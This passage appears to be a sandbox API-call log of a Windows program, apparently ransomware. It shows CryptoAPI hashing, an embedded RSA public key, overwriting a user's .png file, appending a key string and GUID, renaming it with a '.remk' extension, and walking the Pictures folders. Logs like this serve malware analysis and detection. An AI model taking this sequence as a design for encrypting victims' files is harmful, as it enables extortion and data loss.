KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.596] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.596] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x6951f0) returned 1 [0236.599] CryptCreateHash (in: hProv=0x6951f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0236.599] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0236.599] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0236.599] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0236.599] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0236.599] GetLastError () returned 0x0 [0236.599] CryptDestroyHash (hHash=0x31de170) returned 1 [0236.599] CryptReleaseContext (hProv=0x6951f0, dwFlags=0x0) returned 1 [0236.599] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0236.600] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0236.600] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0236.600] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0236.600] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0236.600] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0236.600] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0236.600] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14210) returned 0x37cf820 [0236.600] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0236.600] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0236.600] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x31c0d08 [0236.600] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0236.601] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0236.601] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6990 [0236.601] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37cecb8 [0236.601] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc798 [0236.601] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37ced00 [0236.601] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc7b0 [0236.601] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc7e0 [0236.601] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc840 [0236.601] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc7f8 [0236.601] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0236.601] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 [0236.601] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1db0 [0236.601] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0236.601] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc7e0 | out: hHeap=0x630000) returned 1 [0236.601] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc7f8 | out: hHeap=0x630000) returned 1 [0236.601] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc840 | out: hHeap=0x630000) returned 1 [0236.601] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0236.601] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0236.601] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc840 [0236.601] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fec0 [0236.602] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc7f8 [0236.602] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0f28 [0236.602] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x37bc7e0 [0236.602] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0236.602] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31c0f10 [0236.602] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0236.602] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0236.602] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0236.602] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6c48 [0236.602] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0236.602] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0236.602] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0236.602] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc7f8 | out: hHeap=0x630000) returned 1 [0236.602] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0236.602] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc7e0 | out: hHeap=0x630000) returned 1 [0236.602] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0236.602] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0236.602] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc840 | out: hHeap=0x630000) returned 1 [0236.602] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0236.602] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6990 | out: hHeap=0x630000) returned 1 [0236.603] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1db0 | out: hHeap=0x630000) returned 1 [0236.603] GetCurrentThreadId () returned 0x314 [0236.603] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31c0f10 [0236.603] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37c5d90 [0236.603] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0236.603] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6951f0 [0236.603] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x37bddc8 [0236.603] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0236.603] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0236.603] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3192918 [0236.603] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0236.603] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0236.603] GetCurrentThreadId () returned 0x314 [0236.603] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0236.603] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0236.603] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x65dd10 [0236.603] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0236.603] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0236.603] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0236.603] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0236.603] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0236.604] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0236.604] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0236.604] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5808 [0236.604] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0236.604] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x6a7330 [0236.604] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0236.604] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc840 [0236.604] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0236.604] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0236.604] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0236.604] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0236.604] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0236.604] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0236.604] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0236.604] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0236.604] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc7e0 [0236.604] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0236.604] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fee0 [0236.604] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0236.604] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0236.604] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0236.605] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0236.605] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0236.605] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc7f8 [0236.605] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0236.605] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0236.605] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0236.605] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc7c8 [0236.605] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0236.605] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc858 [0236.605] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0236.605] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72feb0 [0236.605] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f768 | out: hHeap=0x630000) returned 1 [0236.605] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc828 [0236.605] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0236.605] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc810 [0236.605] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0236.605] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc870 [0236.605] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc810 | out: hHeap=0x630000) returned 1 [0236.605] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc810 [0236.605] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc828 | out: hHeap=0x630000) returned 1 [0236.606] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x68ed28 [0236.606] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0236.606] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ea8 [0236.606] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0236.606] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ec8 [0236.606] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc7e0 | out: hHeap=0x630000) returned 1 [0236.606] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc7e0 [0236.606] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0236.606] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x325fd48 [0236.606] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc840 | out: hHeap=0x630000) returned 1 [0236.606] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6d60 [0236.606] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc870 | out: hHeap=0x630000) returned 1 [0236.606] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x37b5b70 [0236.606] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ec8 | out: hHeap=0x630000) returned 1 [0236.606] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x3195950 [0236.606] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0236.606] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6e78 [0236.606] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc7e0 | out: hHeap=0x630000) returned 1 [0236.606] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x37b5d88 [0236.606] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6d60 | out: hHeap=0x630000) returned 1 [0236.607] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x72aea0 [0236.607] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0236.607] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6951f0 | out: hHeap=0x630000) returned 1 [0236.607] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0236.607] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72aea0 | out: hHeap=0x630000) returned 1 [0236.607] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ea8 | out: hHeap=0x630000) returned 1 [0236.607] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6e78 | out: hHeap=0x630000) returned 1 [0236.607] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0236.607] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5d88 | out: hHeap=0x630000) returned 1 [0236.607] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3195950 | out: hHeap=0x630000) returned 1 [0236.607] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f758 | out: hHeap=0x630000) returned 1 [0236.607] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc810 | out: hHeap=0x630000) returned 1 [0236.607] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f778 | out: hHeap=0x630000) returned 1 [0236.607] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc858 | out: hHeap=0x630000) returned 1 [0236.607] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0236.607] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc7f8 | out: hHeap=0x630000) returned 1 [0236.607] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc7c8 | out: hHeap=0x630000) returned 1 [0236.607] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bddc8 | out: hHeap=0x630000) returned 1 [0236.608] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8ac8 | out: hHeap=0x630000) returned 1 [0236.608] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0236.608] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc7b0 | out: hHeap=0x630000) returned 1 [0236.608] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ced00 | out: hHeap=0x630000) returned 1 [0236.608] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fd48 | out: hHeap=0x630000) returned 1 [0236.608] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6a7330 | out: hHeap=0x630000) returned 1 [0236.608] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5808 | out: hHeap=0x630000) returned 1 [0236.608] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6c48 | out: hHeap=0x630000) returned 1 [0236.608] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f08 | out: hHeap=0x630000) returned 1 [0236.608] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0236.608] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0236.608] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6930 | out: hHeap=0x630000) returned 1 [0236.608] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0236.608] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0236.608] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0236.608] WriteFile (in: hFile=0x640, lpBuffer=0x37cf820*, nNumberOfBytesToWrite=0x14200, lpNumberOfBytesWritten=0x3adfb14, lpOverlapped=0x0 | out: lpBuffer=0x37cf820*, lpNumberOfBytesWritten=0x3adfb14*=0x14200, lpOverlapped=0x0) returned 1 [0236.609] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37cf820 | out: hHeap=0x630000) returned 1 [0236.609] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x14205, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.609] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0236.609] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0236.609] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0236.609] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x325fb40 [0236.609] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", cchWideChar=-1, lpMultiByteStr=0x325fb40, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", lpUsedDefaultChar=0x0) returned 41 [0236.609] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x37b5b70 [0236.609] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0236.610] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0236.610] WriteFile (in: hFile=0x640, lpBuffer=0x37b5b70*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x37b5b70*, lpNumberOfBytesWritten=0x3adfb50*=0x28, lpOverlapped=0x0) returned 1 [0236.610] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0236.610] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0236.610] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0236.610] CloseHandle (hObject=0x640) returned 1 [0236.612] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\FzGfdyB6\\UxHea_1OLD4fGeysQVZ.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_dqq7i08g7zkmy4ewb\\4hub e9qkhwukhz-\\fzgfdyb6\\uxhea_1old4fgeysqvz.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\FzGfdyB6\\UxHea_1OLD4fGeysQVZ.png.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_dqq7i08g7zkmy4ewb\\4hub e9qkhwukhz-\\fzgfdyb6\\uxhea_1old4fgeysqvz.png.remk")) returned 1 [0236.613] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bd408 | out: hHeap=0x630000) returned 1 [0236.613] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0236.613] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0236.615] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6b30 | out: hHeap=0x630000) returned 1 [0236.615] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd41dd0c0, ftCreationTime.dwHighDateTime=0x1d5db2e, ftLastAccessTime.dwLowDateTime=0x3e5ea6a0, ftLastAccessTime.dwHighDateTime=0x1d5e163, ftLastWriteTime.dwLowDateTime=0x3e5ea6a0, ftLastWriteTime.dwHighDateTime=0x1d5e163, nFileSizeHigh=0x0, nFileSizeLow=0x14205, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="UxHea_1OLD4fGeysQVZ.png", cAlternateFileName="UXHEA_~1.PNG")) returned 0 [0236.615] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0236.615] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a20 | out: hHeap=0x630000) returned 1 [0236.615] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3186060 | out: hHeap=0x630000) returned 1 [0236.615] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0236.615] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0236.615] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\MJpyx6aDoSvpIH\\") returned="MJpyx6aDoSvpIH\\" [0236.615] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\") returned="4HUb e9qKHwuKHz-\\" [0236.615] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\") returned="_dqq7i08G7zkmy4eWB\\" [0236.615] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="Pictures\\" [0236.616] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0236.616] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0236.616] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0236.616] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0236.616] PathFindFileNameW (pszPath="") returned="" [0236.616] FindFirstFileW 